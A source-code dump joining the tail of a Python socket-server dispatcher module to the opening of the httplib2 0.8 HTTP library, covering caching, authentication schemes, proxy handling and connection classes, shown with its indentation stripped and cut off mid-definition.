def bar(self):
pass
a=foo()
b=foo()
a.bar==b.bar => False
'''
def wait_for_event():
is_event_comming=False
while not is_event_comming:
for mails in self.tmail.maillist:
(fn, args)=mails('describe')
if fn==MASS.speak_to_client:
is_event_comming=True
while True:
'''
Wait for the command from clients.
Will block thread.
'''
try:
data=MASS.sock.recv(1024)
except OSError:
MASS.unbound_server()
prinw("Encounter OS error.")
break #Broken pipe, server shutted down
#time.sleep(MASS.speed) #this sleep time is essential.
#well.. never look back at such thing. this could cause a packet to fail.
ddata=data.decode('utf-8')
if not ddata:
prinw(str(MASS.server_name)+': Encounter Brokenpipe.')
break
if(ddata=='exit'): #this command'd not be sent to interpreter.
MASS.speak_to_client('closed')
MASS.unbound_server() #close the sock.
self.init_dispatcher_MASS()
return 0
else: #push the command into the interpreter.
pkt=self.cmd_evaluator(ddata, MASS)
self.tmail.send(self.cmail, lambda x:x, pkt)
#send the function prompt to the core.
wait_for_event() #wait for the respond of the core.
self.tmail.pread() #execute all the mails.
'''
For safety, we have to use the pread() instead of the pread_all.
the pread_all is almost too fast and may cause two packets sent in a time.
'''
'''
In need of automatic com matching, this machine must be introduced.
Could be seen as the daemon of the actual algorithm machine.
This machine would flash out before any actual machine appears, returning
the address of whom the server idles. And our client would bind themselves
to the idling server, then the connection can be established.
The machine won't care for what the client prompts, it just returns the name
of idling server and close.
This should take a short time.
'''
def com_dispatcher_machine(self, MASS):
sock=MASS.sock
print(MASS.server_name+': '+'COM_DISPATCHER_MACHINE IS RUNNING.')
time.sleep(MASS.speed)
cic=str(self.current_idling_com)
print('DISPATCHER: DISPATCHING TO COM: '+cic)
MASS.speak_to_client(cic)
return
def get_server_status(self):
idling=[]
working=[]
for mass in self.MASSES:
if mass.sock_thread.isAlive():
working.append(mass.server_name)
else:
idling.append(mass.server_name)
return {
'idling' : idling,
'working' : working
}
'''
Start the servers sequentially.
'''
def seq_start(self):
def mass_counter():
while(1):
num=0
for mass in self.MASSES:
if (mass.sock_thread.isAlive()):
num+=1
if(num==0):
self.MASSN=1
else:
self.MASSN=num
time.sleep(1)
def __seq_start():
for mass in self.MASSES:
if (not mass.sock_thread.isAlive()):
self.current_idling_com=mass.com
self.init_dispatcher_MASS()
self.dispatcher_MASS.start()
mass.start()
a=threading.Thread(target=mass_counter)
a.start()
while 1:
__seq_start()
time.sleep(2)
__seq_start()
| mit |
glob3mobile/qgis-g3m | QGIS-Plugin/webappbuilder/ext-libs/httplib2-0.8-py2.7.egg/httplib2/__init__.py | 246 | 69621 | from __future__ import generators
"""
httplib2
A caching http interface that supports ETags and gzip
to conserve bandwidth.
Requires Python 2.3 or later
Changelog:
2007-08-18, Rick: Modified so it's able to use a socks proxy if needed.
"""
__author__ = "Joe Gregorio ([email protected])"
__copyright__ = "Copyright 2006, Joe Gregorio"
__contributors__ = ["Thomas Broyer ([email protected])",
"James Antill",
"Xavier Verges Farrero",
"Jonathan Feinberg",
"Blair Zajac",
"Sam Ruby",
"Louis Nyffenegger"]
__license__ = "MIT"
__version__ = "0.8"
import re
import sys
import email
import email.Utils
import email.Message
import email.FeedParser
import StringIO
import gzip
import zlib
import httplib
import urlparse
import urllib
import base64
import os
import copy
import calendar
import time
import random
import errno
try:
from hashlib import sha1 as _sha, md5 as _md5
except ImportError:
# prior to Python 2.5, these were separate modules
import sha
import md5
_sha = sha.new
_md5 = md5.new
import hmac
from gettext import gettext as _
import socket
try:
from httplib2 import socks
except ImportError:
try:
import socks
except (ImportError, AttributeError):
socks = None
# Build the appropriate socket wrapper for ssl
try:
import ssl # python 2.6
ssl_SSLError = ssl.SSLError
def _ssl_wrap_socket(sock, key_file, cert_file,
disable_validation, ca_certs):
if disable_validation:
cert_reqs = ssl.CERT_NONE
else:
cert_reqs = ssl.CERT_REQUIRED
# We should be specifying SSL version 3 or TLS v1, but the ssl module
# doesn't expose the necessary knobs. So we need to go with the default
# of SSLv23.
return ssl.wrap_socket(sock, keyfile=key_file, certfile=cert_file,
cert_reqs=cert_reqs, ca_certs=ca_certs)
except (AttributeError, ImportError):
ssl_SSLError = None
def _ssl_wrap_socket(sock, key_file, cert_file,
disable_validation, ca_certs):
if not disable_validation:
raise CertificateValidationUnsupported(
"SSL certificate validation is not supported without "
"the ssl module installed. To avoid this error, install "
"the ssl module, or explicity disable validation.")
ssl_sock = socket.ssl(sock, key_file, cert_file)
return httplib.FakeSocket(sock, ssl_sock)
if sys.version_info >= (2,3):
from iri2uri import iri2uri
else:
def iri2uri(uri):
return uri
def has_timeout(timeout): # python 2.6
if hasattr(socket, '_GLOBAL_DEFAULT_TIMEOUT'):
return (timeout is not None and timeout is not socket._GLOBAL_DEFAULT_TIMEOUT)
return (timeout is not None)
__all__ = [
'Http', 'Response', 'ProxyInfo', 'HttpLib2Error', 'RedirectMissingLocation',
'RedirectLimit', 'FailedToDecompressContent',
'UnimplementedDigestAuthOptionError',
'UnimplementedHmacDigestAuthOptionError',
'debuglevel', 'ProxiesUnavailableError']
# The httplib debug level, set to a non-zero value to get debug output
debuglevel = 0
# A request will be tried 'RETRIES' times if it fails at the socket/connection level.
RETRIES = 2
# Python 2.3 support
if sys.version_info < (2,4):
def sorted(seq):
seq.sort()
return seq
# Python 2.3 support
def HTTPResponse__getheaders(self):
"""Return list of (header, value) tuples."""
if self.msg is None:
raise httplib.ResponseNotReady()
return self.msg.items()
if not hasattr(httplib.HTTPResponse, 'getheaders'):
httplib.HTTPResponse.getheaders = HTTPResponse__getheaders
# All exceptions raised here derive from HttpLib2Error
class HttpLib2Error(Exception): pass
# Some exceptions can be caught and optionally
# be turned back into responses.
class HttpLib2ErrorWithResponse(HttpLib2Error):
def __init__(self, desc, response, content):
self.response = response
self.content = content
HttpLib2Error.__init__(self, desc)
class RedirectMissingLocation(HttpLib2ErrorWithResponse): pass
class RedirectLimit(HttpLib2ErrorWithResponse): pass
class FailedToDecompressContent(HttpLib2ErrorWithResponse): pass
class UnimplementedDigestAuthOptionError(HttpLib2ErrorWithResponse): pass
class UnimplementedHmacDigestAuthOptionError(HttpLib2ErrorWithResponse): pass
class MalformedHeader(HttpLib2Error): pass
class RelativeURIError(HttpLib2Error): pass
class ServerNotFoundError(HttpLib2Error): pass
class ProxiesUnavailableError(HttpLib2Error): pass
class CertificateValidationUnsupported(HttpLib2Error): pass
class SSLHandshakeError(HttpLib2Error): pass
class NotSupportedOnThisPlatform(HttpLib2Error): pass
class CertificateHostnameMismatch(SSLHandshakeError):
def __init__(self, desc, host, cert):
HttpLib2Error.__init__(self, desc)
self.host = host
self.cert = cert
# Open Items:
# -----------
# Proxy support
# Are we removing the cached content too soon on PUT (only delete on 200 Maybe?)
# Pluggable cache storage (supports storing the cache in
# flat files by default. We need a plug-in architecture
# that can support Berkeley DB and Squid)
# == Known Issues ==
# Does not handle a resource that uses conneg and Last-Modified but no ETag as a cache validator.
# Does not handle Cache-Control: max-stale
# Does not use Age: headers when calculating cache freshness.
# The number of redirections to follow before giving up.
# Note that only GET redirects are automatically followed.
# Will also honor 301 requests by saving that info and never
# requesting that URI again.
DEFAULT_MAX_REDIRECTS = 5
try:
# Users can optionally provide a module that tells us where the CA_CERTS
# are located.
import ca_certs_locater
CA_CERTS = ca_certs_locater.get()
except ImportError:
# Default CA certificates file bundled with httplib2.
CA_CERTS = os.path.join(
os.path.dirname(os.path.abspath(__file__ )), "cacerts.txt")
# Which headers are hop-by-hop headers by default
HOP_BY_HOP = ['connection', 'keep-alive', 'proxy-authenticate', 'proxy-authorization', 'te', 'trailers', 'transfer-encoding', 'upgrade']
def _get_end2end_headers(response):
hopbyhop = list(HOP_BY_HOP)
hopbyhop.extend([x.strip() for x in response.get('connection', '').split(',')])
return [header for header in response.keys() if header not in hopbyhop]
URI = re.compile(r"^(([^:/?#]+):)?(//([^/?#]*))?([^?#]*)(\?([^#]*))?(#(.*))?")
def parse_uri(uri):
"""Parses a URI using the regex given in Appendix B of RFC 3986.
(scheme, authority, path, query, fragment) = parse_uri(uri)
"""
groups = URI.match(uri).groups()
return (groups[1], groups[3], groups[4], groups[6], groups[8])
def urlnorm(uri):
(scheme, authority, path, query, fragment) = parse_uri(uri)
if not scheme or not authority:
raise RelativeURIError("Only absolute URIs are allowed. uri = %s" % uri)
authority = authority.lower()
scheme = scheme.lower()
if not path:
path = "/"
# Could do syntax based normalization of the URI before
# computing the digest. See Section 6.2.2 of Std 66.
request_uri = query and "?".join([path, query]) or path
scheme = scheme.lower()
defrag_uri = scheme + "://" + authority + request_uri
return scheme, authority, request_uri, defrag_uri
# Cache filename construction (original borrowed from Venus http://intertwingly.net/code/venus/)
re_url_scheme = re.compile(r'^\w+://')
re_slash = re.compile(r'[?/:|]+')
def safename(filename):
"""Return a filename suitable for the cache.
Strips dangerous and common characters to create a filename we
can use to store the cache in.
"""
try:
if re_url_scheme.match(filename):
if isinstance(filename,str):
filename = filename.decode('utf-8')
filename = filename.encode('idna')
else:
filename = filename.encode('idna')
except UnicodeError:
pass
if isinstance(filename,unicode):
filename=filename.encode('utf-8')
filemd5 = _md5(filename).hexdigest()
filename = re_url_scheme.sub("", filename)
filename = re_slash.sub(",", filename)
# limit length of filename
if len(filename)>200:
filename=filename[:200]
return ",".join((filename, filemd5))
NORMALIZE_SPACE = re.compile(r'(?:\r\n)?[ \t]+')
def _normalize_headers(headers):
return dict([ (key.lower(), NORMALIZE_SPACE.sub(value, ' ').strip()) for (key, value) in headers.iteritems()])
def _parse_cache_control(headers):
retval = {}
if headers.has_key('cache-control'):
parts = headers['cache-control'].split(',')
parts_with_args = [tuple([x.strip().lower() for x in part.split("=", 1)]) for part in parts if -1 != part.find("=")]
parts_wo_args = [(name.strip().lower(), 1) for name in parts if -1 == name.find("=")]
retval = dict(parts_with_args + parts_wo_args)
return retval
# Whether to use a strict mode to parse WWW-Authenticate headers
# Might lead to bad results in case of ill-formed header value,
# so disabled by default, falling back to relaxed parsing.
# Set to true to turn on, usefull for testing servers.
USE_WWW_AUTH_STRICT_PARSING = 0
# In regex below:
# [^\0-\x1f\x7f-\xff()<>@,;:\\\"/[\]?={} \t]+ matches a "token" as defined by HTTP
# "(?:[^\0-\x08\x0A-\x1f\x7f-\xff\\\"]|\\[\0-\x7f])*?" matches a "quoted-string" as defined by HTTP, when LWS have already been replaced by a single space
# Actually, as an auth-param value can be either a token or a quoted-string, they are combined in a single pattern which matches both:
# \"?((?<=\")(?:[^\0-\x1f\x7f-\xff\\\"]|\\[\0-\x7f])*?(?=\")|(?<!\")[^\0-\x08\x0A-\x1f\x7f-\xff()<>@,;:\\\"/[\]?={} \t]+(?!\"))\"?
WWW_AUTH_STRICT = re.compile(r"^(?:\s*(?:,\s*)?([^\0-\x1f\x7f-\xff()<>@,;:\\\"/[\]?={} \t]+)\s*=\s*\"?((?<=\")(?:[^\0-\x08\x0A-\x1f\x7f-\xff\\\"]|\\[\0-\x7f])*?(?=\")|(?<!\")[^\0-\x1f\x7f-\xff()<>@,;:\\\"/[\]?={} \t]+(?!\"))\"?)(.*)$")
WWW_AUTH_RELAXED = re.compile(r"^(?:\s*(?:,\s*)?([^ \t\r\n=]+)\s*=\s*\"?((?<=\")(?:[^\\\"]|\\.)*?(?=\")|(?<!\")[^ \t\r\n,]+(?!\"))\"?)(.*)$")
UNQUOTE_PAIRS = re.compile(r'\\(.)')
def _parse_www_authenticate(headers, headername='www-authenticate'):
"""Returns a dictionary of dictionaries, one dict
per auth_scheme."""
retval = {}
if headers.has_key(headername):
try:
authenticate = headers[headername].strip()
www_auth = USE_WWW_AUTH_STRICT_PARSING and WWW_AUTH_STRICT or WWW_AUTH_RELAXED
while authenticate:
# Break off the scheme at the beginning of the line
if headername == 'authentication-info':
(auth_scheme, the_rest) = ('digest', authenticate)
else:
(auth_scheme, the_rest) = authenticate.split(" ", 1)
# Now loop over all the key value pairs that come after the scheme,
# being careful not to roll into the next scheme
match = www_auth.search(the_rest)
auth_params = {}
while match:
if match and len(match.groups()) == 3:
(key, value, the_rest) = match.groups()
auth_params[key.lower()] = UNQUOTE_PAIRS.sub(r'\1', value) # '\\'.join([x.replace('\\', '') for x in value.split('\\\\')])
match = www_auth.search(the_rest)
retval[auth_scheme.lower()] = auth_params
authenticate = the_rest.strip()
except ValueError:
raise MalformedHeader("WWW-Authenticate")
return retval
def _entry_disposition(response_headers, request_headers):
"""Determine freshness from the Date, Expires and Cache-Control headers.
We don't handle the following:
1. Cache-Control: max-stale
2. Age: headers are not used in the calculations.
Not that this algorithm is simpler than you might think
because we are operating as a private (non-shared) cache.
This lets us ignore 's-maxage'. We can also ignore
'proxy-invalidate' since we aren't a proxy.
We will never return a stale document as
fresh as a design decision, and thus the non-implementation
of 'max-stale'. This also lets us safely ignore 'must-revalidate'
since we operate as if every server has sent 'must-revalidate'.
Since we are private we get to ignore both 'public' and
'private' parameters. We also ignore 'no-transform' since
we don't do any transformations.
The 'no-store' parameter is handled at a higher level.
So the only Cache-Control parameters we look at are:
no-cache
only-if-cached
max-age
min-fresh
"""
retval = "STALE"
cc = _parse_cache_control(request_headers)
cc_response = _parse_cache_control(response_headers)
if request_headers.has_key('pragma') and request_headers['pragma'].lower().find('no-cache') != -1:
retval = "TRANSPARENT"
if 'cache-control' not in request_headers:
request_headers['cache-control'] = 'no-cache'
elif cc.has_key('no-cache'):
retval = "TRANSPARENT"
elif cc_response.has_key('no-cache'):
retval = "STALE"
elif cc.has_key('only-if-cached'):
retval = "FRESH"
elif response_headers.has_key('date'):
date = calendar.timegm(email.Utils.parsedate_tz(response_headers['date']))
now = time.time()
current_age = max(0, now - date)
if cc_response.has_key('max-age'):
try:
freshness_lifetime = int(cc_response['max-age'])
except ValueError:
freshness_lifetime = 0
elif response_headers.has_key('expires'):
expires = email.Utils.parsedate_tz(response_headers['expires'])
if None == expires:
freshness_lifetime = 0
else:
freshness_lifetime = max(0, calendar.timegm(expires) - date)
else:
freshness_lifetime = 0
if cc.has_key('max-age'):
try:
freshness_lifetime = int(cc['max-age'])
except ValueError:
freshness_lifetime = 0
if cc.has_key('min-fresh'):
try:
min_fresh = int(cc['min-fresh'])
except ValueError:
min_fresh = 0
current_age += min_fresh
if freshness_lifetime > current_age:
retval = "FRESH"
return retval
def _decompressContent(response, new_content):
content = new_content
try:
encoding = response.get('content-encoding', None)
if encoding in ['gzip', 'deflate']:
if encoding == 'gzip':
content = gzip.GzipFile(fileobj=StringIO.StringIO(new_content)).read()
if encoding == 'deflate':
content = zlib.decompress(content)
response['content-length'] = str(len(content))
# Record the historical presence of the encoding in a way the won't interfere.
response['-content-encoding'] = response['content-encoding']
del response['content-encoding']
except IOError:
content = ""
raise FailedToDecompressContent(_("Content purported to be compressed with %s but failed to decompress.") % response.get('content-encoding'), response, content)
return content
def _updateCache(request_headers, response_headers, content, cache, cachekey):
if cachekey:
cc = _parse_cache_control(request_headers)
cc_response = _parse_cache_control(response_headers)
if cc.has_key('no-store') or cc_response.has_key('no-store'):
cache.delete(cachekey)
else:
info = email.Message.Message()
for key, value in response_headers.iteritems():
if key not in ['status','content-encoding','transfer-encoding']:
info[key] = value
# Add annotations to the cache to indicate what headers
# are variant for this request.
vary = response_headers.get('vary', None)
if vary:
vary_headers = vary.lower().replace(' ', '').split(',')
for header in vary_headers:
key = '-varied-%s' % header
try:
info[key] = request_headers[header]
except KeyError:
pass
status = response_headers.status
if status == 304:
status = 200
status_header = 'status: %d\r\n' % status
header_str = info.as_string()
header_str = re.sub("\r(?!\n)|(?<!\r)\n", "\r\n", header_str)
text = "".join([status_header, header_str, content])
cache.set(cachekey, text)
def _cnonce():
dig = _md5("%s:%s" % (time.ctime(), ["0123456789"[random.randrange(0, 9)] for i in range(20)])).hexdigest()
return dig[:16]
def _wsse_username_token(cnonce, iso_now, password):
return base64.b64encode(_sha("%s%s%s" % (cnonce, iso_now, password)).digest()).strip()
# For credentials we need two things, first
# a pool of credential to try (not necesarily tied to BAsic, Digest, etc.)
# Then we also need a list of URIs that have already demanded authentication
# That list is tricky since sub-URIs can take the same auth, or the
# auth scheme may change as you descend the tree.
# So we also need each Auth instance to be able to tell us
# how close to the 'top' it is.
class Authentication(object):
def __init__(self, credentials, host, request_uri, headers, response, content, http):
(scheme, authority, path, query, fragment) = parse_uri(request_uri)
self.path = path
self.host = host
self.credentials = credentials
self.http = http
def depth(self, request_uri):
(scheme, authority, path, query, fragment) = parse_uri(request_uri)
return request_uri[len(self.path):].count("/")
def inscope(self, host, request_uri):
# XXX Should we normalize the request_uri?
(scheme, authority, path, query, fragment) = parse_uri(request_uri)
return (host == self.host) and path.startswith(self.path)
def request(self, method, request_uri, headers, content):
"""Modify the request headers to add the appropriate
Authorization header. Over-ride this in sub-classes."""
pass
def response(self, response, content):
"""Gives us a chance to update with new nonces
or such returned from the last authorized response.
Over-rise this in sub-classes if necessary.
Return TRUE is the request is to be retried, for
example Digest may return stale=true.
"""
return False
class BasicAuthentication(Authentication):
def __init__(self, credentials, host, request_uri, headers, response, content, http):
Authentication.__init__(self, credentials, host, request_uri, headers, response, content, http)
def request(self, method, request_uri, headers, content):
"""Modify the request headers to add the appropriate
Authorization header."""
headers['authorization'] = 'Basic ' + base64.b64encode("%s:%s" % self.credentials).strip()
class DigestAuthentication(Authentication):
"""Only do qop='auth' and MD5, since that
is all Apache currently implements"""
def __init__(self, credentials, host, request_uri, headers, response, content, http):
Authentication.__init__(self, credentials, host, request_uri, headers, response, content, http)
challenge = _parse_www_authenticate(response, 'www-authenticate')
self.challenge = challenge['digest']
qop = self.challenge.get('qop', 'auth')
self.challenge['qop'] = ('auth' in [x.strip() for x in qop.split()]) and 'auth' or None
if self.challenge['qop'] is None:
raise UnimplementedDigestAuthOptionError( _("Unsupported value for qop: %s." % qop))
self.challenge['algorithm'] = self.challenge.get('algorithm', 'MD5').upper()
if self.challenge['algorithm'] != 'MD5':
raise UnimplementedDigestAuthOptionError( _("Unsupported value for algorithm: %s." % self.challenge['algorithm']))
self.A1 = "".join([self.credentials[0], ":", self.challenge['realm'], ":", self.credentials[1]])
self.challenge['nc'] = 1
def request(self, method, request_uri, headers, content, cnonce = None):
"""Modify the request headers"""
H = lambda x: _md5(x).hexdigest()
KD = lambda s, d: H("%s:%s" % (s, d))
A2 = "".join([method, ":", request_uri])
self.challenge['cnonce'] = cnonce or _cnonce()
request_digest = '"%s"' % KD(H(self.A1), "%s:%s:%s:%s:%s" % (
self.challenge['nonce'],
'%08x' % self.challenge['nc'],
self.challenge['cnonce'],
self.challenge['qop'], H(A2)))
headers['authorization'] = 'Digest username="%s", realm="%s", nonce="%s", uri="%s", algorithm=%s, response=%s, qop=%s, nc=%08x, cnonce="%s"' % (
self.credentials[0],
self.challenge['realm'],
self.challenge['nonce'],
request_uri,
self.challenge['algorithm'],
request_digest,
self.challenge['qop'],
self.challenge['nc'],
self.challenge['cnonce'])
if self.challenge.get('opaque'):
headers['authorization'] += ', opaque="%s"' % self.challenge['opaque']
self.challenge['nc'] += 1
def response(self, response, content):
if not response.has_key('authentication-info'):
challenge = _parse_www_authenticate(response, 'www-authenticate').get('digest', {})
if 'true' == challenge.get('stale'):
self.challenge['nonce'] = challenge['nonce']
self.challenge['nc'] = 1
return True
else:
updated_challenge = _parse_www_authenticate(response, 'authentication-info').get('digest', {})
if updated_challenge.has_key('nextnonce'):
self.challenge['nonce'] = updated_challenge['nextnonce']
self.challenge['nc'] = 1
return False
class HmacDigestAuthentication(Authentication):
"""Adapted from Robert Sayre's code and DigestAuthentication above."""
__author__ = "Thomas Broyer ([email protected])"
def __init__(self, credentials, host, request_uri, headers, response, content, http):
Authentication.__init__(self, credentials, host, request_uri, headers, response, content, http)
challenge = _parse_www_authenticate(response, 'www-authenticate')
self.challenge = challenge['hmacdigest']
# TODO: self.challenge['domain']
self.challenge['reason'] = self.challenge.get('reason', 'unauthorized')
if self.challenge['reason'] not in ['unauthorized', 'integrity']:
self.challenge['reason'] = 'unauthorized'
self.challenge['salt'] = self.challenge.get('salt', '')
if not self.challenge.get('snonce'):
raise UnimplementedHmacDigestAuthOptionError( _("The challenge doesn't contain a server nonce, or this one is empty."))
self.challenge['algorithm'] = self.challenge.get('algorithm', 'HMAC-SHA-1')
if self.challenge['algorithm'] not in ['HMAC-SHA-1', 'HMAC-MD5']:
raise UnimplementedHmacDigestAuthOptionError( _("Unsupported value for algorithm: %s." % self.challenge['algorithm']))
self.challenge['pw-algorithm'] = self.challenge.get('pw-algorithm', 'SHA-1')
if self.challenge['pw-algorithm'] not in ['SHA-1', 'MD5']:
raise UnimplementedHmacDigestAuthOptionError( _("Unsupported value for pw-algorithm: %s." % self.challenge['pw-algorithm']))
if self.challenge['algorithm'] == 'HMAC-MD5':
self.hashmod = _md5
else:
self.hashmod = _sha
if self.challenge['pw-algorithm'] == 'MD5':
self.pwhashmod = _md5
else:
self.pwhashmod = _sha
self.key = "".join([self.credentials[0], ":",
self.pwhashmod.new("".join([self.credentials[1], self.challenge['salt']])).hexdigest().lower(),
":", self.challenge['realm']])
self.key = self.pwhashmod.new(self.key).hexdigest().lower()
def request(self, method, request_uri, headers, content):
"""Modify the request headers"""
keys = _get_end2end_headers(headers)
keylist = "".join(["%s " % k for k in keys])
headers_val = "".join([headers[k] for k in keys])
created = time.strftime('%Y-%m-%dT%H:%M:%SZ',time.gmtime())
cnonce = _cnonce()
request_digest = "%s:%s:%s:%s:%s" % (method, request_uri, cnonce, self.challenge['snonce'], headers_val)
request_digest = hmac.new(self.key, request_digest, self.hashmod).hexdigest().lower()
headers['authorization'] = 'HMACDigest username="%s", realm="%s", snonce="%s", cnonce="%s", uri="%s", created="%s", response="%s", headers="%s"' % (
self.credentials[0],
self.challenge['realm'],
self.challenge['snonce'],
cnonce,
request_uri,
created,
request_digest,
keylist)
def response(self, response, content):
challenge = _parse_www_authenticate(response, 'www-authenticate').get('hmacdigest', {})
if challenge.get('reason') in ['integrity', 'stale']:
return True
return False
class WsseAuthentication(Authentication):
"""This is thinly tested and should not be relied upon.
At this time there isn't any third party server to test against.
Blogger and TypePad implemented this algorithm at one point
but Blogger has since switched to Basic over HTTPS and
TypePad has implemented it wrong, by never issuing a 401
challenge but instead requiring your client to telepathically know that
their endpoint is expecting WSSE profile="UsernameToken"."""
def __init__(self, credentials, host, request_uri, headers, response, content, http):
Authentication.__init__(self, credentials, host, request_uri, headers, response, content, http)
def request(self, method, request_uri, headers, content):
"""Modify the request headers to add the appropriate
Authorization header."""
headers['authorization'] = 'WSSE profile="UsernameToken"'
iso_now = time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime())
cnonce = _cnonce()
password_digest = _wsse_username_token(cnonce, iso_now, self.credentials[1])
headers['X-WSSE'] = 'UsernameToken Username="%s", PasswordDigest="%s", Nonce="%s", Created="%s"' % (
self.credentials[0],
password_digest,
cnonce,
iso_now)
class GoogleLoginAuthentication(Authentication):
def __init__(self, credentials, host, request_uri, headers, response, content, http):
from urllib import urlencode
Authentication.__init__(self, credentials, host, request_uri, headers, response, content, http)
challenge = _parse_www_authenticate(response, 'www-authenticate')
service = challenge['googlelogin'].get('service', 'xapi')
# Bloggger actually returns the service in the challenge
# For the rest we guess based on the URI
if service == 'xapi' and request_uri.find("calendar") > 0:
service = "cl"
# No point in guessing Base or Spreadsheet
#elif request_uri.find("spreadsheets") > 0:
# service = "wise"
auth = dict(Email=credentials[0], Passwd=credentials[1], service=service, source=headers['user-agent'])
resp, content = self.http.request("https://www.google.com/accounts/ClientLogin", method="POST", body=urlencode(auth), headers={'Content-Type': 'application/x-www-form-urlencoded'})
lines = content.split('\n')
d = dict([tuple(line.split("=", 1)) for line in lines if line])
if resp.status == 403:
self.Auth = ""
else:
self.Auth = d['Auth']
def request(self, method, request_uri, headers, content):
"""Modify the request headers to add the appropriate
Authorization header."""
headers['authorization'] = 'GoogleLogin Auth=' + self.Auth
AUTH_SCHEME_CLASSES = {
"basic": BasicAuthentication,
"wsse": WsseAuthentication,
"digest": DigestAuthentication,
"hmacdigest": HmacDigestAuthentication,
"googlelogin": GoogleLoginAuthentication
}
AUTH_SCHEME_ORDER = ["hmacdigest", "googlelogin", "digest", "wsse", "basic"]
class FileCache(object):
"""Uses a local directory as a store for cached files.
Not really safe to use if multiple threads or processes are going to
be running on the same cache.
"""
def __init__(self, cache, safe=safename): # use safe=lambda x: md5.new(x).hexdigest() for the old behavior
self.cache = cache
self.safe = safe
if not os.path.exists(cache):
os.makedirs(self.cache)
def get(self, key):
retval = None
cacheFullPath = os.path.join(self.cache, self.safe(key))
try:
f = file(cacheFullPath, "rb")
retval = f.read()
f.close()
except IOError:
pass
return retval
def set(self, key, value):
cacheFullPath = os.path.join(self.cache, self.safe(key))
f = file(cacheFullPath, "wb")
f.write(value)
f.close()
def delete(self, key):
cacheFullPath = os.path.join(self.cache, self.safe(key))
if os.path.exists(cacheFullPath):
os.remove(cacheFullPath)
class Credentials(object):
def __init__(self):
self.credentials = []
def add(self, name, password, domain=""):
self.credentials.append((domain.lower(), name, password))
def clear(self):
self.credentials = []
def iter(self, domain):
for (cdomain, name, password) in self.credentials:
if cdomain == "" or domain == cdomain:
yield (name, password)
class KeyCerts(Credentials):
"""Identical to Credentials except that
name/password are mapped to key/cert."""
pass
class AllHosts(object):
pass
class ProxyInfo(object):
"""Collect information required to use a proxy."""
bypass_hosts = ()
def __init__(self, proxy_type, proxy_host, proxy_port,
proxy_rdns=None, proxy_user=None, proxy_pass=None):
"""The parameter proxy_type must be set to one of socks.PROXY_TYPE_XXX
constants. For example:
p = ProxyInfo(proxy_type=socks.PROXY_TYPE_HTTP,
proxy_host='localhost', proxy_port=8000)
"""
self.proxy_type = proxy_type
self.proxy_host = proxy_host
self.proxy_port = proxy_port
self.proxy_rdns = proxy_rdns
self.proxy_user = proxy_user
self.proxy_pass = proxy_pass
def astuple(self):
return (self.proxy_type, self.proxy_host, self.proxy_port,
self.proxy_rdns, self.proxy_user, self.proxy_pass)
def isgood(self):
return (self.proxy_host != None) and (self.proxy_port != None)
def applies_to(self, hostname):
return not self.bypass_host(hostname)
def bypass_host(self, hostname):
"""Has this host been excluded from the proxy config"""
if self.bypass_hosts is AllHosts:
return True
bypass = False
for domain in self.bypass_hosts:
if hostname.endswith(domain):
bypass = True
return bypass
def proxy_info_from_environment(method='http'):
"""
Read proxy info from the environment variables.
"""
if method not in ['http', 'https']:
return
env_var = method + '_proxy'
url = os.environ.get(env_var, os.environ.get(env_var.upper()))
if not url:
return
pi = proxy_info_from_url(url, method)
no_proxy = os.environ.get('no_proxy', os.environ.get('NO_PROXY', ''))
bypass_hosts = []
if no_proxy:
bypass_hosts = no_proxy.split(',')
# special case, no_proxy=* means all hosts bypassed
if no_proxy == '*':
bypass_hosts = AllHosts
pi.bypass_hosts = bypass_hosts
return pi
def proxy_info_from_url(url, method='http'):
"""
Construct a ProxyInfo from a URL (such as http_proxy env var)
"""
url = urlparse.urlparse(url)
username = None
password = None
port = None
if '@' in url[1]:
ident, host_port = url[1].split('@', 1)
if ':' in ident:
username, password = ident.split(':', 1)
else:
password = ident
else:
host_port = url[1]
if ':' in host_port:
host, port = host_port.split(':', 1)
else:
host = host_port
if port:
port = int(port)
else:
port = dict(https=443, http=80)[method]
proxy_type = 3 # socks.PROXY_TYPE_HTTP
return ProxyInfo(
proxy_type = proxy_type,
proxy_host = host,
proxy_port = port,
proxy_user = username or None,
proxy_pass = password or None,
)
class HTTPConnectionWithTimeout(httplib.HTTPConnection):
"""
HTTPConnection subclass that supports timeouts
All timeouts are in seconds. If None is passed for timeout then
Python's default timeout for sockets will be used. See for example
the docs of socket.setdefaulttimeout():
http://docs.python.org/library/socket.html#socket.setdefaulttimeout
"""
def __init__(self, host, port=None, strict=None, timeout=None, proxy_info=None):
httplib.HTTPConnection.__init__(self, host, port, strict)
self.timeout = timeout
self.proxy_info = proxy_info
def connect(self):
"""Connect to the host and port specified in __init__."""
# Mostly verbatim from httplib.py.
if self.proxy_info and socks is None:
raise ProxiesUnavailableError(
'Proxy support missing but proxy use was requested!')
msg = "getaddrinfo returns an empty list"
if self.proxy_info and self.proxy_info.isgood():
use_proxy = True
proxy_type, proxy_host, proxy_port, proxy_rdns, proxy_user, proxy_pass = self.proxy_info.astuple()
else:
use_proxy = False
if use_proxy and proxy_rdns:
host = proxy_host
port = proxy_port
else:
host = self.host
port = self.port
for res in socket.getaddrinfo(host, port, 0, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
try:
if use_proxy:
self.sock = socks.socksocket(af, socktype, proto)
self.sock.setproxy(proxy_type, proxy_host, proxy_port, proxy_rdns, proxy_user, proxy_pass)
else:
self.sock = socket.socket(af, socktype, proto)
self.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
# Different from httplib: support timeouts.
if has_timeout(self.timeout):
self.sock.settimeout(self.timeout)
# End of difference from httplib.
if self.debuglevel > 0:
print "connect: (%s, %s) ************" % (self.host, self.port)
if use_proxy:
print "proxy: %s ************" % str((proxy_host, proxy_port, proxy_rdns, proxy_user, proxy_pass))
self.sock.connect((self.host, self.port) + sa[2:])
except socket.error, msg:
if self.debuglevel > 0:
print "connect fail: (%s, %s)" % (self.host, self.port)
if use_proxy:
print "proxy: %s" % str((proxy_host, proxy_port, proxy_rdns, proxy_user, proxy_pass))
if self.sock:
self.sock.close()
self.sock = None
continue
break
if not self.sock:
raise socket.error, msg
class HTTPSConnectionWithTimeout(httplib.HTTPSConnection):
"""
This class allows communication via SSL.
All timeouts are in seconds. If None is passed for timeout then
Python's default timeout for sockets will be used. See for example
the docs of socket.setdefaulttimeout():
http://docs.python.org/library/socket.html#socket.setdefaulttimeout
"""
def __init__(self, host, port=None, key_file=None, cert_file=None,
strict=None, timeout=None, proxy_info=None,
